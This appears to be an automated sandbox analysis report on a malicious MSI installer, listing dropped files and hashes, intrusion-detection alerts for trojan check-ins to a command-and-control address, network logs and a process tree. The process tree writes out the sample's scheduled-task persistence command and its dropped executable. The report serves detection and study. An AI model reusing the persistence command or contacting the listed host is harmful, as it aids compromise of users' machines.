                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                      C:\Windows\Temp\~DF3B519F2FC3953126.TMP

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.06947348371947007
                                      Encrypted:false
                                      SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOj46u2uH/QJQ8hQVky6lS:2F0i8n0itFzDHFU6eKdS
                                      MD5:B3973958D9FF98310092BCB5E4D1A4EE
                                      SHA1:07300CB350EA09CAB0618077650413B520B88D95
                                      SHA-256:B8DBE22108A95C620EF9A917833AF8DD26E2ED2106C1221EBEE6ED98CE22752B
                                      SHA-512:1283DDAD20D396A5074FDC67958A91934CC73B99A2CA035A3051DF93FAEB315E3C64440B92230901EFE52373AFE6119BEF2396640C5EE4C78DBDFE7BF8543849
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Temp\~DF452888C694CEC694.TMP

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.1458944438109988
                                      Encrypted:false
                                      SSDEEP:48:L6DuQZsrMLFXOxT59e3lhlSzUgYsSzfTl:+DrsTTeVhlYRTY
                                      MD5:DA3A1FF557C48ED3EB70F408DE86B3D8
                                      SHA1:D63584EBDD40C7DBB9111A590B8B41A55E05E66F
                                      SHA-256:29AB99E4DA063BF3D71774C81D761ADC1B44150B25B051F2305645B7B278D1C7
                                      SHA-512:F8F0CA894F0E72FF087B60BED648F161D607C400EE3C301F96518171A7A661FA70AB8111B032F9C29AB057B41820529C04EBDFD319EDBFE35D398A8E0113539B
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Temp\~DFDC9DDDECCC20DBF2.TMP

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Temp\~DFF2FF7337FADF7859.TMP

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):81920
                                      Entropy (8bit):0.0736555263838163
                                      Encrypted:false
                                      SSDEEP:24:ZPA1vb+ipVJ+dipVJ+ZVqKwGZrk62+AO3+:C1T+Sz4SzUgYl2U3+
                                      MD5:739CD46EF02C75184188B80215391639
                                      SHA1:4E1ECF1C64291CEB35E3CFD557E619A8601E71C9
                                      SHA-256:B3DBFD7986D161CA4AFE866AE9EFB6AEE86EE791D9EBD68B36543E09453E1C6E
                                      SHA-512:6D4F04FFBF98F65A95244E5763388896037C0EE59F494EAEE33B0343D581694C710741986244EBAA8769DE147A2258BC0C2806BF79E363C3E20A7A171E490B15
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                      Entropy (8bit):7.7836156225290445
                                      TrID:
                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                      File name:sdlvrr.msi
                                      File size:974'848 bytes
                                      MD5:3e83644e86d6165d35a80650d01df249
                                      SHA1:f3f82555822edc27b3ec559686e7d7b23153761b
                                      SHA256:5cbae41670f29829cbbeb50560a2184385e25c109dcbf3bfcff6656bfc09ae32
                                      SHA512:02051e5a017af65cdf1adc3680e93362440e60fa85bdad6c49592ed20b7a26b9a9b9ac5b71cc8cd25b5441ea69d60a90e8879674b0546dce00b4a6b8ddb812c3
                                      SSDEEP:24576:uErhloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SK:uErhloJf3Ar0pBre25G
                                      TLSH:2E25E1E1A740C4A5E8A795798437CAA76423BE1ECCA84A4C3991FF0F7D723475023D9B
                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                      File Icon

                                      Icon Hash:2d2e3797b32b2b99

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949984172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949976172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949983172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949985172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949977172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949979172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949980172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949869172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949981172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949982172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949817172.111.138.1005552TCP
                                      2024-12-30T11:35:24.387568+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949929172.111.138.1005552TCP
                                      2024-12-30T11:35:41.848807+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949817172.111.138.1005552TCP
                                      2024-12-30T11:35:51.094216+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949869172.111.138.1005552TCP
                                      2024-12-30T11:36:00.201860+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949929172.111.138.1005552TCP
                                      2024-12-30T11:36:09.217517+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949976172.111.138.1005552TCP
                                      2024-12-30T11:36:18.283230+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949977172.111.138.1005552TCP
                                      2024-12-30T11:36:27.296276+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949979172.111.138.1005552TCP
                                      2024-12-30T11:36:36.378336+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949980172.111.138.1005552TCP
                                      2024-12-30T11:36:45.679041+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949981172.111.138.1005552TCP
                                      2024-12-30T11:36:59.623794+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949982172.111.138.1005552TCP
                                      2024-12-30T11:37:09.091777+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949983172.111.138.1005552TCP
                                      2024-12-30T11:37:18.155276+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949984172.111.138.1005552TCP
                                      2024-12-30T11:37:27.170694+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949985172.111.138.1005552TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 30, 2024 11:35:41.843170881 CET498175552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:41.848299026 CET555249817172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:35:41.848414898 CET498175552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:41.848807096 CET498175552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:41.853662014 CET555249817172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:35:44.002301931 CET555249817172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:35:44.002414942 CET498175552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:44.062964916 CET498175552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:44.067873001 CET555249817172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:35:51.088294983 CET498695552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:51.093328953 CET555249869172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:35:51.093444109 CET498695552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:51.094216108 CET498695552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:51.099096060 CET555249869172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:35:53.250422955 CET555249869172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:35:53.250495911 CET498695552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:53.252087116 CET498695552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:35:53.256846905 CET555249869172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:00.196374893 CET499295552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:00.201329947 CET555249929172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:00.201419115 CET499295552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:00.201859951 CET499295552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:00.206677914 CET555249929172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:02.578927994 CET555249929172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:02.579005003 CET499295552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:02.625499010 CET499295552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:02.630433083 CET555249929172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:09.212075949 CET499765552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:09.216892004 CET555249976172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:09.217035055 CET499765552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:09.217516899 CET499765552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:09.222383022 CET555249976172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:11.359992981 CET555249976172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:11.360065937 CET499765552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:11.421736956 CET499765552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:11.426558018 CET555249976172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:18.277615070 CET499775552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:18.282558918 CET555249977172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:18.282669067 CET499775552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:18.283230066 CET499775552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:18.289098978 CET555249977172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:20.402379036 CET555249977172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:20.402478933 CET499775552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:20.454220057 CET499775552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:20.459461927 CET555249977172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:27.290857077 CET499795552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:27.295766115 CET555249979172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:27.295851946 CET499795552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:27.296276093 CET499795552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:27.301095963 CET555249979172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:29.419676065 CET555249979172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:29.419799089 CET499795552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:29.437378883 CET499795552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:29.442224026 CET555249979172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:36.366508007 CET499805552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:36.371532917 CET555249980172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:36.371651888 CET499805552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:36.378335953 CET499805552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:36.383153915 CET555249980172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:38.496921062 CET555249980172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:38.497024059 CET499805552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:38.546729088 CET499805552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:38.552361012 CET555249980172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:45.673728943 CET499815552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:45.678550005 CET555249981172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:45.678625107 CET499815552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:45.679040909 CET499815552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:45.683841944 CET555249981172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:59.567495108 CET555249981172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:59.567558050 CET499815552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:59.592952967 CET499815552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:59.597812891 CET555249981172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:59.618335962 CET499825552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:59.623193979 CET555249982172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:36:59.623297930 CET499825552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:59.623794079 CET499825552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:36:59.628649950 CET555249982172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:01.747854948 CET555249982172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:01.747958899 CET499825552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:01.773617029 CET499825552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:01.779041052 CET555249982172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:09.082726002 CET499835552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:09.091135979 CET555249983172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:09.091212034 CET499835552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:09.091777086 CET499835552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:09.101357937 CET555249983172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:11.587027073 CET555249983172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:11.587184906 CET499835552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:11.664946079 CET499835552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:11.669787884 CET555249983172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:18.149729013 CET499845552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:18.154710054 CET555249984172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:18.154823065 CET499845552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:18.155276060 CET499845552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:18.160110950 CET555249984172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:25.516892910 CET555249984172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:25.517122984 CET499845552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:25.546705961 CET499845552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:25.551527023 CET555249984172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:27.165215015 CET499855552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:27.170103073 CET555249985172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:27.170178890 CET499855552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:27.170694113 CET499855552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:27.175461054 CET555249985172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:29.299047947 CET555249985172.111.138.100192.168.2.9
                                      Dec 30, 2024 11:37:29.299190998 CET499855552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:29.358835936 CET499855552192.168.2.9172.111.138.100
                                      Dec 30, 2024 11:37:29.363872051 CET555249985172.111.138.100192.168.2.9

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 30, 2024 11:35:24.395662069 CET1.1.1.1192.168.2.90x3ab0No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Dec 30, 2024 11:35:24.395662069 CET1.1.1.1192.168.2.90x3ab0No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:1
                                      Start time:05:35:29
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sdlvrr.msi"
                                      Imagebase:0x7ff7f6850000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:2
                                      Start time:05:35:29
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                      Imagebase:0x7ff7f6850000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:3
                                      Start time:05:35:30
                                      Start date:30/12/2024
                                      Path:C:\Windows\Installer\MSI4976.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Installer\MSI4976.tmp"
                                      Imagebase:0x320000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2616737221.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 53%, ReversingLabs
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:4
                                      Start time:05:35:31
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
                                      Imagebase:0xc50000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:05:35:31
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff70f010000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:05:35:31
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs
                                      Imagebase:0x500000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.2614707550.0000000003830000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.2614274905.00000000032A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.2614274905.00000000032C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:7
                                      Start time:05:35:31
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
                                      Imagebase:0x330000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:05:35:33
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 53%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:05:35:40
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:05:35:48
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:05:35:56
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:05:36:01
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:05:37:00
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:4.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:10.3%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:39
